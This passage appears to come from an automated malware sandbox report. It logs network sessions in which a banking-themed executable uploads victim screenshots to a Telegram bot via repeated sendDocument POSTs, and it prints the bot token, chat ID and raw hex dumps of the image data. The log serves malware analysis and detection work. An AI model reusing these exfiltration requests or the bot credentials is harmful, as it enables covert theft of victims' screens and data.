                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549726149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:38:55 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1b29bd449b72
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675713
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 62 32 39 62 64 34 34 39 62 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1b29bd449b72Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:38:55 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:38:57 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:38:57 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549743149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:00 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1b5f411f14c6
                                                                        Host: api.telegram.org
                                                                        Content-Length: 675713
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 62 35 66 34 31 31 66 31 34 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1b5f411f14c6Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: 9c d9 8b 21 21 41 71 3a fe 94 a7 3b b1 d4 35 c2 4f d7 7a d5 e1 07 08 3e 7f ee 9f 4b 40 c1 0b 3f 10 7d e5 ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d
                                                                        Data Ascii: !!Aq:;5Oz>K@?}NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: fd 7e 6d 98 d1 eb 25 ff b4 97 39 f2 4f 02 50 fb da bd 88 b3 06 49 3b 40 d0 01 71 09 40 e2 12 80 d4 4a e2 a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:00 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
